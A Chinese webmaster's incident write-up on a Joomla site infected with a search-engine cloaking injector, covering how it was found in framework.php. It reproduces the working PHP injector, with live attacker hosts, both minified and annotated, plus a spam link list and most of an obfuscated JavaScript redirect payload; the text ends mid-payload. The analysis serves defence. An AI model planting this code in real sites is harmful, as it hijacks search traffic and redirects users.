本文将介绍一下joomlachina.cn遭遇的挂马事件以及对应的处理方法。希望给同样遇到类似攻击的朋友提供一些处理思路。
问题现象
大概一个月之前收到服务器发来的告警信息说网站存在违规内容,因为当时家里有事,就一直没有处理,直到最近才得空。但已经造成了惨重的损失:网站被百度 K 站了,已经搜索不到任何内容,通过 site 指令也找不到任何信息;并且在百度统计里可以看到出现了很多不属于我站点的关键词。第一感觉就是网站中了木马。(事后看,这类告警应当尽快处理:挂马持续的时间越长,被搜索引擎收录的垃圾页面就越多,后续申诉恢复也越慢。)
找到木马
我一直想不明白为什么其他不属于我站的关键词会出现在百度的统计数据里面。直到我尝试用百度的抓取工具抓取网站内容的时候才恍然大悟:百度抓取到的内容和用户用浏览器看到的内容完全不一样。这种对爬虫和真实用户返回不同内容的手法叫做搜索引擎劫持(cloaking),正因为站长自己用浏览器看不到任何异常,它才能长期不被发现。
如何定位木马文件呢?首先我做的就是确认影响的范围,看是部分页面受影响还是所有页面受影响,最终发现是所有页面都被影响了。那么可以断定应该是 Joomla 核心或者其第三方系统插件被感染了。更换了系统模板,发现问题依然存在,说明不是模板导致的;然后将所有的系统插件逐一关闭排除,发现问题依然存在。那么基本上可以断定是 Joomla 核心文件被感染了。(此时,如果你不关心木马长什么样,直接用官方发行包覆盖升级 Joomla 就能去掉这段注入代码。但要注意:覆盖升级只替换核心文件,既不能堵住入侵入口,也不会清除攻击者可能另外留下的 webshell、后门管理员账号或计划任务,升级之后仍然必须排查入侵原因并对整站做全盘检查。)
那么具体是哪一个文件呢?攻击者通常不会深入了解 Joomla 的结构,为了让脚本对全站的每个请求都生效,一般只会改动每次请求都会经过的公共入口文件:根目录的 index.php、includes/defines.php、includes/framework.php(后台 administrator/ 目录下也有同名文件,同样要检查)。逐一打开这几个文件,很容易看到多出来的异常代码。我的情况是 framework.php 被修改了。更通用的方法是用工具列出最近被修改过的 PHP 文件,例如在站点根目录执行 `find . -name '*.php' -mtime -30`;但文件修改时间可以被攻击者用 touch 伪造,所以更可靠的做法是把所有核心文件和官方同版本的干净发行包做校验和(md5sum/sha256sum)比对,多出来或内容不一致的文件就是重点怀疑对象。
分析木马
// NOTE(review): the injector exactly as found at the top of Joomla's framework.php, minified on one line. It contains live attacker hostnames - keep it as evidence, do not execute it. An expanded, annotated copy follows below.
set_time_limit(0);error_reporting(0);$a=stristr;$c=$_SERVER;define('url',$c['REQUEST_URI']);define('ref',$c['HTTP_REFERER']);define('ent',$c['HTTP_USER_AGENT']);define('site','http://red.qweppp.com/?');define('road','road='.$c['HTTP_HOST'].url);define('waps','@Android|Browser|Mobile|Wap|iOs|iPad|iPhone|iPod@i');define('regs','@Baidu|Sogou|Yisou|Sm.cn@i');define('area',$a(url,'.xml')or $a(url,'.doc')or $a(url,'scm')or $a(url,'.txt')or $a(url,'.ppt')or $a(url,'.xls')or $a(url,'.csv')or $a(url,'.shtml'));if(preg_match(regs,ent)){if(area){echo papa(site.road.'&time');exit;}else{echo papa("http://red.qweppp.com/u.php");}}if(area&&preg_match(regs,ref)&&preg_match(waps,ent)){echo papa('http://tz11.zvqsqkz.com/111php.html');exit;}elseif(area){echo '<!--Code:201-->'."\n";}function papa($e){$f=curl_init();curl_setopt($f,CURLOPT_URL,$e);curl_setopt($f,CURLOPT_USERAGENT,ent);curl_setopt($f,CURLOPT_TIMEOUT,30);curl_setopt($f,CURLOPT_RETURNTRANSFER,1);$g=curl_exec($f);return $g;}
上面这就是注入的木马。把这段代码交给 AI 重新整理并加上注释之后,就能看清它的真面目了(AI 给出的解释需要自己对照代码逐行核对,不要照单全收)。
<?php
// Expanded copy of the SEO-cloaking injector found in Joomla's framework.php.
// Flow: capture request facts -> branch on User-Agent / Referer / URL suffix ->
// fetch attacker-hosted content with cURL and echo it. Nothing is stored on disk
// or in the database; every spam page is fetched per request from the C2.
// (The minified original joins the 'area' terms with PHP's low-precedence `or`;
// inside a function argument that gives the same result as `||` used here.)
// 1. Remove the execution-time limit so a slow C2 fetch (30 s timeout below) is not killed mid-request.
set_time_limit(0);
// 2. Silence every PHP error/notice (e.g. the undefined HTTP_REFERER index below) so nothing leaks into the page.
error_reporting(0);
// 3. Bare constant `stristr` is undefined, so on PHP 7 it degrades to the string "stristr" (notice suppressed)
//    and $a(...) becomes a case-insensitive substring test. On PHP 8 an undefined constant is a fatal Error,
//    so this variant presumably only runs on PHP 7 hosts - TODO confirm the host's PHP version.
$a = stristr;
// 4. Snapshot of the request environment.
$c = $_SERVER;
// 5. Request facts captured as constants.
define('url', $c['REQUEST_URI']); // requested path + query, e.g. /article/xxx.shtml
define('ref', $c['HTTP_REFERER']); // Referer header; null when absent (the notice is suppressed above)
define('ent', $c['HTTP_USER_AGENT']); // raw User-Agent of the visitor or crawler
define('site', 'http://red.qweppp.com/?'); // C2 #1: serves the cloaked spam page content
define('road', 'road=' . $c['HTTP_HOST'] . url); // tells the C2 which victim host + path is being requested, so it can serve per-site content
define('waps', '@Android|Browser|Mobile|Wap|iOs|iPad|iPhone|iPod@i'); // mobile-device User-Agent pattern
define('regs', '@Baidu|Sogou|Yisou|Sm.cn@i'); // Chinese search-engine pattern; matched against the UA (crawler) and against the Referer (human coming from search results)
// 6. "area": true when the URI contains one of the attacker's fake-page suffixes
//    (.xml/.doc/scm/.txt/.ppt/.xls/.csv/.shtml). These are the URLs the C2 injects
//    (cf. the u.php link list), not existing or sensitive files on the site.
define('area', $a(url, '.xml') || $a(url, '.doc') || $a(url, 'scm') ||
$a(url, '.txt') || $a(url, '.ppt') || $a(url, '.xls') ||
$a(url, '.csv') || $a(url, '.shtml'));
// 7. Branch A - the User-Agent looks like a search-engine crawler.
if (preg_match(regs, ent)) { // crawler UA (Baidu/Sogou/Yisou/Sm.cn)
if (area) { // crawler requesting one of the fake URLs
// Serve the spam page fetched from the C2 (site + road + '&time') and stop: the real Joomla page is never rendered.
echo papa(site . road . '&time');
exit; // terminate before Joomla runs
} else { // crawler on a real page of the site
// Prepend the hidden link list from u.php, then fall through so Joomla renders normally; this is how the crawler discovers the fake URLs.
echo papa("http://red.qweppp.com/u.php");
}
}
// 8. Branch B - a human on a mobile device who arrived at a fake URL from a search result:
//    the Referer (not the UA) matches a search engine, and the UA matches a mobile device.
if (area && preg_match(regs, ref) && preg_match(waps, ent)) {
// Emit the page from C2 #2 (the obfuscated redirect/iframe script) instead of the site, then stop.
echo papa('http://tz11.zvqsqkz.com/111php.html');
exit;
} elseif (area) { // any other visitor of a fake URL (desktop browser, direct hit, scanner)
// Only an HTML comment marker is emitted; presumably lets the operator verify the implant is live - TODO confirm.
echo '<!--Code:201-->' . "
";
}
// 9. Fetch a URL from the C2 and return the response body; nothing is output here.
function papa($e) {
$f = curl_init(); // new cURL handle
curl_setopt($f, CURLOPT_URL, $e); // target: one of the attacker URLs above
curl_setopt($f, CURLOPT_USERAGENT, ent); // forward the visitor's UA so the C2 can tailor the response to the crawler
curl_setopt($f, CURLOPT_TIMEOUT, 30); // give up after 30 s
curl_setopt($f, CURLOPT_RETURNTRANSFER, 1); // return the body instead of printing it
$g = curl_exec($f); // blocking fetch; the handle is never closed
return $g; // raw response body, or false on failure (echo then prints nothing)
}
?>
看到了这个代码,就理解了为什么我的站点会在搜索引擎里面出现不属于我站点的内容了。代码先根据 User-Agent 判断来访者是不是搜索引擎爬虫:爬虫访问正常页面时,它会在页面最前面插入从 u.php 取回的一批隐藏链接,引导爬虫去抓取站点上根本不存在的 /article/xxx.shtml 之类的地址;爬虫访问这些地址时,它通过 curl 从远程取回垃圾页面直接输出并 exit,真实的 Joomla 页面完全不会渲染。而通过搜索结果点进这些地址的手机用户,收到的则是另一个远程页面(里面是跳转脚本)。这样我的网站就凭空多了很多非法内容,而这些内容并不存储在数据库或磁盘上,全部是按请求从远程动态获取的,所以在后台和数据库里都找不到。不得不说,这个想法非常巧妙。
进一步追踪
在上面的源文件中,我们可以看到主要的回传网址有两个:http://red.qweppp.com/u.php 和 http://tz11.zvqsqkz.com/111php.html。注意,追查这类地址时不要用日常浏览器直接打开,建议在隔离环境里用 curl 之类的工具抓取后离线查看,既避免被跳转到恶意站点,也避免把自己的访问记录留给攻击者。
进一步的追查red.qweppp.com/u.php,发现这个里面仅仅只是输出一些链接,
<a href="/article/2025101787719685-HMMGNL.shtml"></a> <a href="/article/2025101766145-MXMLHNOG.shtml"></a> <a href="/article/2025101743323-HMISA.shtml"></a> <a href="/article/20251017986716-CNTGGXTI.shtml"></a> <a href="/article/2025101740587-FALMUZNQ.shtml"></a> <a href="/article/2025101754525474-WJPWX.shtml"></a> <a href="/article/2025101769755604-NFMRFLL.shtml"></a> <a href="/article/20251017622306-WOXUVE.shtml"></a> <a href="/article/20251017954180-EAXFJ.shtml"></a> <a href="/article/2025101794709-OMEZII.shtml"></a> <a href="/article/202510179733148-ZKHEOSHP.shtml"></a> <a href="/article/20251017532793-PNODAAN.shtml"></a> <a href="/article/2025101798237-MXTPHH.shtml"></a> <a href="/article/202510176218398-WAUZOHWK.shtml"></a> <a href="/article/20251017716228-YABTCMKI.shtml"></a> <a href="/article/20251017666216-ZKAETJ.shtml"></a> <a href="/article/20251017192492-VJLPX.shtml"></a> <a href="/article/2025101744149979-BCKTLNH.shtml"></a> <a href="/article/2025101727357-SRHBV.shtml"></a> <a href="/article/202510174229578-FNVZQ.shtml"></a> <a href="/article/2025101737080916-WPDTT.shtml"></a> <a href="/article/2025101712489-TRFMVR.shtml"></a> <a href="/article/2025101733305347-BEAGMP.shtml"></a> <a href="/article/20251017476730-RKYKSKI.shtml"></a> <a href="/article/2025101773255422-REPUKF.shtml"></a> <a href="/article/2025101774276-HZPATE.shtml"></a> <a href="/article/20251017595991-OULRGZY.shtml"></a> <a href="/article/20251017533654-BQPFEGH.shtml"></a> <a href="/article/202510174102860-WVGRRMRW.shtml"></a> <a href="/article/20251017800993-EZCJCG.shtml"></a> <a href="/article/2025101760627-IRFHXF.shtml"></a> <a href="/article/2025101725884352-YAQQYKPI.shtml"></a> <a href="/article/202510177284306-XQBYNHA.shtml"></a> <a href="/article/20251017246884-AKSPABM.shtml"></a> <a href="/article/2025101788342-FXOJD.shtml"></a> <a href="/article/202510176763314-ATPJU.shtml"></a> <a href="/article/202510172802844-MLNABBB.shtml"></a> <a 
href="/article/2025101747602-MAXUJ.shtml"></a> <a href="/article/2025101773696656-QBTWGCBU.shtml"></a> <a href="/article/202510172320936-FEEOSJP.shtml"></a> <a href="/article/2025101754185723-XNYDX.shtml"></a> <a href="/article/2025101727356219-OHMXACX.shtml"></a> <a href="/article/2025101739799875-AVAYTDJ.shtml"></a> <a href="/article/2025101722843927-KOAGPWI.shtml"></a> <a href="/article/2025101785513-OXQHJU.shtml"></a> <a href="/article/202510175146929-IJTPRPO.shtml"></a> <a href="/article/20251017900534-RLWXRAMO.shtml"></a> <a href="/article/202510171855975-GUTQTD.shtml"></a> <a href="http://www.tyqcxs.com/article/2025101744090802-JOKZUGQ.shtml"></a> <a href="http://www.scpgyy.com/article/20251017760546-LOJQV.shtml"></a> <a href="http://zhangguisong.com/article/20251017211750-YSRFT.shtml"></a> <a href="http://www.cuw68.com.cn/article/20251017613599-KZLXGJT.shtml"></a> <a href="http://www.acdcdc.com/article/2025101711916-EMXFJ.shtml"></a> <a href="https://www.zhangguisong.com/article/2025101760875667-XRXJJPJG.shtml"></a>
这些就是我的网站中凭空多出来的页面地址了。可以看到列表末尾还有几条指向其他域名的链接,这些站点很可能同样中了这个木马(未核实)。
另外一个是 https://tz11.zvqsqkz.com/111php.html,这个里面主要是执行一个js脚本。
< script >
// Payload page served to mobile visitors coming from search results. Obfuscated with
// jsjiami.com v7 (marker below). Every _0x192e24(index, key) call is a string lookup:
// index into the table returned by _0x3def(), then base64-decode and RC4-decrypt with
// the key (see _0x42c8). The decoded literals are not shown on this page, so the
// comments below only state what the control flow itself shows.
var _0xodl = 'jsjiami.com.v7';
var _0x192e24 = _0x42c8;
// Self-check / anti-tamper IIFE: 'tfi'+'hs' and 'hs'+'up' are reversed into 'shift' and 'push'
// by the helper passed as the third argument, then the string table is rotated until a
// checksum over parseInt'd entries equals the expected constant (0x84a39).
(function(_0x170108, _0x19ce60, _0x3fa9fc, _0x4ae35e, _0x3c5a28, _0x417d21, _0x342a68) {
return _0x170108 = _0x170108 >> 0x9, _0x417d21 = 'hs', _0x342a68 = 'hs',
function(_0x3ebaff, _0x178b7c, _0x1f125b, _0x2e8459, _0x118618) {
var _0xbe7963 = _0x42c8;
_0x2e8459 = 'tfi', _0x417d21 = _0x2e8459 + _0x417d21, _0x118618 = 'up', _0x342a68 += _0x118618, _0x417d21 = _0x1f125b(_0x417d21), _0x342a68 = _0x1f125b(_0x342a68), _0x1f125b = 0x0;
var _0x7cdb62 = _0x3ebaff();
while (!![] && --_0x4ae35e + _0x178b7c) {
try {
_0x2e8459 = parseInt(_0xbe7963(0x1b4, 'nHm4')) / 0x1 + parseInt(_0xbe7963(0x193, 'KJk!')) / 0x2 * (-parseInt(_0xbe7963(0x1d9, 'YI9&')) / 0x3) + -parseInt(_0xbe7963(0x1a3, 'nHm4')) / 0x4 + -parseInt(_0xbe7963(0x197, '6MY8')) / 0x5 * (-parseInt(_0xbe7963(0x1bd, '9H3o')) / 0x6) + parseInt(_0xbe7963(0x1dd, '$ezs')) / 0x7 + -parseInt(_0xbe7963(0x1c2, 'vOvs')) / 0x8 + parseInt(_0xbe7963(0x1a5, 'CR%w')) / 0x9;
} catch (_0x1b1dd7) {
_0x2e8459 = _0x1f125b;
} finally {
_0x118618 = _0x7cdb62[_0x417d21]();
if (_0x170108 <= _0x4ae35e) _0x1f125b ? _0x3c5a28 ? _0x2e8459 = _0x118618 : _0x3c5a28 = _0x118618 : _0x1f125b = _0x118618;
else {
// The second table entry, stripped of the characters in this class, spells 'jsjiami.com.v7';
// it is compared against the first entry to detect edits to the table.
if (_0x1f125b == _0x3c5a28['replace'](/[LDIAGhXHMYSJUtTgqQ=]/g, '')) {
if (_0x2e8459 === _0x178b7c) {
_0x7cdb62['un' + _0x417d21](_0x118618);
break;
}
_0x7cdb62[_0x342a68](_0x118618);
}
}
}
}
}(_0x3fa9fc, _0x19ce60, function(_0x4aae40, _0x76116, _0x11829d, _0x35cf8a, _0x36bc14, _0xdda70f, _0x24d60b) {
// String reverser: split('') / reverse() / join('').
return _0x76116 = 'split', _0x4aae40 = arguments[0x0], _0x4aae40 = _0x4aae40[_0x76116](''), _0x11829d = 'reverse', _0x4aae40 = _0x4aae40[_0x11829d]('v'), _0x35cf8a = 'join', (0x1be83d, _0x4aae40[_0x35cf8a](''));
});
}(0x19800, 0x84a39, _0x3def, 0xce), _0x3def) && (_0xodl = 0xce);
// Crawler User-Agent pattern. Crawlers are deliberately excluded from the payload below
// so that search engines never observe the redirect (the PHP side cloaks the other way round).
var reg = /(Baiduspider|360Spider|YisouSpider|YandexBot|Sogou inst spider|Sogou web spider|spider)/i;
// Only non-crawler visitors reach the payload (decoded method is presumably 'test' on navigator.userAgent).
if (!reg[_0x192e24(0x1b0, 'Yk2o')](navigator[_0x192e24(0x191, 'Yk2o')])) {
// Mobile-device check on a navigator string (presumably userAgent.match).
let flag = navigator[_0x192e24(0x1d7, 'afP3')][_0x192e24(0x1ce, 'ouXe')](/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i);
if (flag) {
// A second navigator property is searched (indexOf-style, `> -1`) for two decoded strings;
// the payload only runs when neither is present. Exact strings unknown - TODO decode.
const platformInfo = navigator[_0x192e24(0x1de, '8a!E')];
if (!(platformInfo[_0x192e24(0x1d6, 'm**Y')](_0x192e24(0x186, 'RXJk')) > -0x1 || platformInfo[_0x192e24(0x18b, 'P7fm')](_0x192e24(0x1df, '(tpc')) > -0x1)) {
// Pick one of five decoded destination URLs at random.
var arr = [_0x192e24(0x187, 'RP#y'), _0x192e24(0x1a0, '6kvS'), _0x192e24(0x1ae, '[1]8'), _0x192e24(0x1b3, 'Yk2o'), _0x192e24(0x1b7, 'RP#y')],
url = arr[Math[_0x192e24(0x1ca, '$ezs')](Math[_0x192e24(0x199, '(tpc')]() * arr[_0x192e24(0x189, '[ovU')])];
// Apple devices: assign url to a window property (presumably location.href, i.e. a top-level redirect).
// Everyone else: stash url in the implicit global _1 for the element built below. Note _1 is never
// assigned on the Apple branch, so the line after the next would throw if _1 is not defined elsewhere -
// harmless to the attacker because the redirect has already been requested.
/iphone|ipod|ipad|Macintosh/i [_0x192e24(0x1be, '1^2P')](navigator[_0x192e24(0x18a, 'KJk!')][_0x192e24(0x1a9, 'ek[h')]()) ? window[_0x192e24(0x1e1, '8a!E')][_0x192e24(0x1ab, '%E85')] = url: _1 = url;
// document[...](...) is presumably document.write; then a style element and a second element whose
// content embeds _1 (likely an iframe) are appended to the document - the "page inside a page" effect.
document[_0x192e24(0x1af, '1^2P')](_0x192e24(0x1ad, '1^2P'));
var hd = document[_0x192e24(0x1d1, 'ddu9')],
styleCSS = document[_0x192e24(0x1c6, 'KJk!')](_0x192e24(0x192, '1^2P')),
yabo = document[_0x192e24(0x195, 'ouXe')](_0x192e24(0x1d0, '1wHD'));
styleCSS[_0x192e24(0x1cc, 'PlNE')] = _0x192e24(0x1c1, ']syq'), yabo[_0x192e24(0x198, 'KJk!')](_0x192e24(0x1c5, 'r[pl'), _0x192e24(0x1c0, '$ezs')), yabo[_0x192e24(0x18f, 'afP3')] = _0x192e24(0x1a4, 'P7fm') + _1 + _0x192e24(0x1cb, 'a6Hp'), hd[_0x192e24(0x1c3, 'Yk2o')](styleCSS), hd[_0x192e24(0x19a, '[ovU')][_0x192e24(0x19f, 'r[pl')](yabo);
}
}
}
// String decoder used by every _0x192e24(index, key) call. Resolves an obfuscated literal by
// table index (offset 0x185), decodes it once with base64 followed by RC4 under the given key,
// and caches the plaintext in the arguments object of the first call.
function _0x42c8(_0x348803, _0x11e9f5) {
var _0x3defa0 = _0x3def();
return _0x42c8 = function(_0x42c8a0, _0xebe692) {
_0x42c8a0 = _0x42c8a0 - 0x185; // table indices in the script are offset by 0x185
var _0x4b97a5 = _0x3defa0[_0x42c8a0];
if (_0x42c8['wIgEBw'] === undefined) { // one-time setup of the decoder functions
// Base64 decoder with the standard alphabet; the bytes are then percent-encoded and
// passed through decodeURIComponent so UTF-8 plaintext comes out as proper text.
var _0x4f675b = function(_0x32e9f2) {
var _0x4d5662 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
var _0x27eef3 = '',
_0x49b085 = '';
for (var _0x3ca7ff = 0x0, _0x4722b2, _0x1430b7, _0x180b51 = 0x0; _0x1430b7 = _0x32e9f2['charAt'](_0x180b51++); ~_0x1430b7 && (_0x4722b2 = _0x3ca7ff % 0x4 ? _0x4722b2 * 0x40 + _0x1430b7 : _0x1430b7, _0x3ca7ff++ % 0x4) ? _0x27eef3 += String['fromCharCode'](0xff & _0x4722b2 >> (-0x2 * _0x3ca7ff & 0x6)) : 0x0) {
_0x1430b7 = _0x4d5662['indexOf'](_0x1430b7);
}
for (var _0x4570a5 = 0x0, _0x7862ac = _0x27eef3['length']; _0x4570a5 < _0x7862ac; _0x4570a5++) {
_0x49b085 += '%' + ('00' + _0x27eef3['charCodeAt'](_0x4570a5)['toString'](0x10))['slice'](-0x2);
}
return decodeURIComponent(_0x49b085);
};
// RC4: 256-byte key schedule from the string key, then keystream XOR over the base64-decoded input.
var _0x463051 = function(_0x110b71, _0x387ff6) {
var _0x129e8a = [],
_0x24ef46 = 0x0,
_0x2bddad, _0x2f0a63 = '';
_0x110b71 = _0x4f675b(_0x110b71);
var _0x23a7ba;
for (_0x23a7ba = 0x0; _0x23a7ba < 0x100; _0x23a7ba++) {
_0x129e8a[_0x23a7ba] = _0x23a7ba;
}
for (_0x23a7ba = 0x0; _0x23a7ba < 0x100; _0x23a7ba++) {
_0x24ef46 = (_0x24ef46 + _0x129e8a[_0x23a7ba] + _0x387ff6['charCodeAt'](_0x23a7ba % _0x387ff6['length'])) % 0x100, _0x2bddad = _0x129e8a[_0x23a7ba], _0x129e8a[_0x23a7ba] = _0x129e8a[_0x24ef46], _0x129e8a[_0x24ef46] = _0x2bddad;
}
_0x23a7ba = 0x0, _0x24ef46 = 0x0;
for (var _0x119638 = 0x0; _0x119638 < _0x110b71['length']; _0x119638++) {
_0x23a7ba = (_0x23a7ba + 0x1) % 0x100, _0x24ef46 = (_0x24ef46 + _0x129e8a[_0x23a7ba]) % 0x100, _0x2bddad = _0x129e8a[_0x23a7ba], _0x129e8a[_0x23a7ba] = _0x129e8a[_0x24ef46], _0x129e8a[_0x24ef46] = _0x2bddad, _0x2f0a63 += String['fromCharCode'](_0x110b71['charCodeAt'](_0x119638) ^ _0x129e8a[(_0x129e8a[_0x23a7ba] + _0x129e8a[_0x24ef46]) % 0x100]);
}
return _0x2f0a63;
};
_0x42c8['PVmMnr'] = _0x463051, _0x348803 = arguments, _0x42c8['wIgEBw'] = !![]; // install decoder, use arguments as the cache
}
// Cache key = index + first table entry; decode and memoise on first use.
var _0x3cc465 = _0x3defa0[0x0],
_0x15d91a = _0x42c8a0 + _0x3cc465,
_0x272013 = _0x348803[_0x15d91a];
return !_0x272013 ? (_0x42c8['yyvruY'] === undefined && (_0x42c8['yyvruY'] = !![]), _0x4b97a5 = _0x42c8['PVmMnr'](_0x4b97a5, _0xebe692), _0x348803[_0x15d91a] = _0x4b97a5) : _0x4b97a5 = _0x272013, _0x4b97a5;
}, _0x42c8(_0x348803, _0x11e9f5);
}
// `var _hmt = _hmt || []` is the Baidu Tongji (analytics) boilerplate. Each IIFE below creates an
// element from a decoded tag name, sets one decoded property on it (presumably src of a <script>),
// and inserts it before the first element of another decoded tag name (presumably
// parentNode.insertBefore) - i.e. dynamic loading of attacker-chosen scripts/trackers.
// The decoded names and URLs are not visible here.
var _hmt = _hmt || [];
(function() {
var _0x503760 = _0x192e24,
_0x1759da = {
'xztje': _0x503760(0x188, '6MY8'),
'sNLQk': _0x503760(0x1e0, 'ggYp')
},
_0x5d2bd9 = document[_0x503760(0x1c8, '6kvS')](_0x1759da[_0x503760(0x1aa, 'RXJk')]);
_0x5d2bd9[_0x503760(0x18d, '$C(]')] = _0x1759da[_0x503760(0x1a8, '$O2@')];
var _0x4af0e9 = document[_0x503760(0x1dc, 'w3^Q')](_0x503760(0x1d8, 'Yk2o'))[0x0];
_0x4af0e9[_0x503760(0x1bb, '9H3o')][_0x503760(0x194, '%E85')](_0x5d2bd9, _0x4af0e9);
}());
var _hmt = _hmt || [];
(function() {
// Same pattern as above with a different decoded element/property pair.
var _0x4099b3 = _0x192e24,
_0x19adcf = document[_0x4099b3(0x1a7, '%Soz')](_0x4099b3(0x1bc, '[ovU'));
_0x19adcf[_0x4099b3(0x19d, 'YMSR')] = _0x4099b3(0x1ac, '1^2P');
var _0x55e7da = document[_0x4099b3(0x1e2, 'a6Hp')](_0x4099b3(0x190, 'PlNE'))[0x0];
_0x55e7da[_0x4099b3(0x1da, '%Soz')][_0x4099b3(0x19c, '#5cH')](_0x19adcf, _0x55e7da);
}());
var _hmt = _hmt || [];
// Obfuscated string table. The nested IIFEs simply concatenate into one flat array; each entry
// is base64(RC4(plaintext, per-call key)) and is decoded on demand by _0x42c8. Entry 0 is the
// jsjiami marker (or 0xce after the self-check above reassigns _0xodl); entry 1 is the marker
// with junk characters interleaved, used by the self-check. After the first call the function is
// replaced by a closure that returns the cached array.
function _0x3def() {
var _0x27feef = (function() {
return [_0xodl, 'LMSJjUsTjigHamtYiQq.cYoqmtAJ.vID7ThXhgDG==', 'uComW5ldMmoQ', 'W5BcHCofr8kBpCoPbmk/a8krcq'].concat((function() {
return ['bhpcG8oBWOL1W4BcMCoKW7FdKCoz', 'lSosnrFcPmodWRach0eEamk2', 'f8oWWRpcQMVdGcJcPJfhgt5Zz3VdK8oJWOPdEq', 'lXZcPmkTWQb9za'].concat((function() {
return ['WPBdMCkdm8oFF8oxcSkmoSkIkG', 'W7lcISolECoFpa', 'W6tcTCkSW7e7A8kWpCokW7a', 'C1ne'].concat((function() {
return ['W4iEc8oceWaQW6CVW7DdWOa', 'WOO3WPa', 'ibO7omo6', 'zqTOtCoUnqHhWRSQrW'].concat((function() {
return ['W6W7WQ3cKL85rKzNWO19odZcIrLyvrzIw8kPW5q9WR1rWPVcMHZcLstdH8onoCkktNOKW4FdJYJcUCkbW61nW4G', 'WPldIhVdR8oNAsiZWQn/uComW5G', 'a8oNWQq', 'WQNdSd4jWQVcKGDKx8kkW4hcVmo5'].concat((function() {
return ['EhNdMSoCph1qnv7dRcKv', 'lmk0swpdH8kCW4hcJmkmW6VdGtKnra', 'WRedWQJcS1Xoda', 'oSoLp8k/k31oWRb5ugXawG'].concat((function() {
return ['W6nqW5tcOmkw', 'W6xdSfbWfM/cGftcJfJdPa', 'WOBcHmoqW51C', 'bw/cLCoy'].concat((function() {
return ['sSomW5/dHmo8W5JcKIJcMgZcQCknstxcGdPQm8oNqvbEW7/cM1lcO3eMWQDHkSo6DmogW5BdOIBdKmkzWR9AgSoPWRWeW7iTW69HCLldUmoNxLpcH1NcMmk1', 'hSovW47dGmoUW4ldLxpcHhhcQSkkwsNcJtL5cmkLEt4BW5hdMLxcOc82W70XiSkTyCkDWONcVZhcJmooW7TFdmkqW4KnWQ9XWRKYz17cP8oPaHxdLKddHCk2W7vhb8kVW5/cHCkvWRZcRCopcSorWPxdMNjkWRxcUhBcPSomimoVWP3dPG3dPSoVWRSak01CFCkmBmosW5v3q2edW61utmoUW7xcOtXFWR19WQ7cO3SFqW', 'W78GW73dTSoYxSkDW7LFf8o9neWQg1RcNCk8cHddIqX9W71fCMNdLSoOeXySW7tdN8ohfmkxbmosqMLZaMddMa', 'vCokW4ldGmoQ'].concat((function() {
return ['lIC7fa', 'W67cJmkTW4Ww', 'ba15wuS', 'mJy8emokxmkkfHDKWQpcJ8o+qtVdSCkbr048lSo6gM/dTmoSW5xcI8k0W6iEycfKiIpcM8kAW7/dLCkQWRyCW6BdSq'].concat((function() {
return ['WQNdSJ8iWQ7cLeb9D8koW7JcRq', 'hxZcGSoBWPv1W4RcK8oMW70', 'W7u4cCkvWQNcPmkXW6/cImoGWRLMW6ZcRCkYkCoFnHxdS0HbW5ddRqLPAtG3iSoUW7/cM8kBW6HwWQf8W6/cKYi5W5HuW73dK2rjWOXcWRNcQCogymopWPfxodW', 'WPWZW6pdMCkHwmoLW4PQhmkDbX4CgdhdQLZcTmoRW7zRyc9LW4PAocCKW6NdVCk+dCouzmotBCk4qmonf2VdO8oO'].concat((function() {
return ['WQdcRIWVuZVcG0lcJMddTSkj', 'W5FcMJ/cTSkMka', 'ztjBW7RdQW', 'W60Td8kaWRtdQSoqWQ/cHmoO'].concat((function() {
return ['W6FcT8kSW70LAW', 'WQX+t8ovW67cPSkQWQJcGComW7zmW64', 'vSoDW5JdGa', 'xcZdGSkhW4KWWRxdJCoxW5tdM8o2ha4'].concat((function() {
return ['uHzOW7m', 'WOxdIKZdNuxdOmksyZJcKuXxiq4uw8k4dc0dW5/cQ8o4c8ojCSoCWQHLW60gW7dcHZaFFv9sWOlcLI3cQxiHWOD5WR9LhINcOh3dMeaEWR8LhMRcSmkbWOhdTetdOxq4iu1NWO4NmX9QW5JdMSojW6Guhmk3f8opWQZdJr/dLSkYhv5JWOldM3hdOcSGxInOuJ/dICo+WPldJ8o1WRaPW4qBW6RcV8oxW7XKW4pcQCokWR7cVmore3jmW710WPxdHxBcPmkfW67cMaldPSo7qmk4W4GdWQrPl0pdNH7dUSkzdd1jc2ddQxHNWPCsWRJdMCkfWPmub8oDeCo1W7RdL8oRaHBdJmoskg92WPDlWRySW745jLpdJwNcJSorWPFcVmoDW7e1DGhdOmoIera7WQKGFW', 'cCoIWQGIWQxdPmkwWR/dRSo9xqJdUW', 'oZi4bCoxaSoMurzGWRi'].concat((function() {
return ['FmktyuFdP8krW4mImwm1jSkg', 'zXD5w8oZ', 'WOBdJSkse8oFBSoGd8kliSkZiCkY', 'sNOnWRm8'].concat((function() {
return ['W6C9WRZcG1HMlav6WPHTi3K', 'WQxdMCk7W5NcVs5LomoxWOVdSrFdGIdcQJNcM0pcOH0', 'trTLW7pdKG', 'C1tcKXeaW4WBCmkOFSkBwCo+WRn7W4u3W7OLW4GnW6j3WRZcUa00utqVW6f3W5JdVH90obv4W7ldJmkAWOarFK4CpSo5t8k9WPJcKSogW7CPWPqZWRqUWQKTsCkBW4fpFH95W7fZW5ldOSoEW5tcMfpdNSoSwKldLCkcWQKeyMpdPCoeWRndWOBdImkjWRFdMrldSSooW6NdKCkUW7L/WPhdUghcHfbMW73dI0lcQCohWP7cR8o7W5hdGmo0W7nEWO3dI8oKBCk2W6KlW57cQSo5WObgDq'].concat((function() {
return ['WQf2WQ3cUrbFuCoMW4u', 'zWL9sCo0na5dWRCRrGRdKW', 'imobjbxcUa', 'E8o8WO9+WPpcVSkkCSkIymozWQ/dUW'].concat((function() {
return ['WQBdLCk5', 'WQldP8k5W5y', 'W7u4cCkvWQNcPmkXW6/cImoGWRLMW6ZcRCkYkCoFnHxdS0HbW5ddRqLPAwWXC8oQW7dcK8kFWRjqW7jWW6ZdHhrTWOSgW7VdLJCxW55eWR7cRSobmCkCW4jFAd0', 'l8k9rSowWQy'].concat((function() {
return ['W6hdVM56d37cVhJcIu4', 'FCo5pmkpW5C0WQZdGtlcI10Oxq', 'v8oVqt8Ebt8', 'W43dLSoixCoTAYRcVK8'].concat((function() {
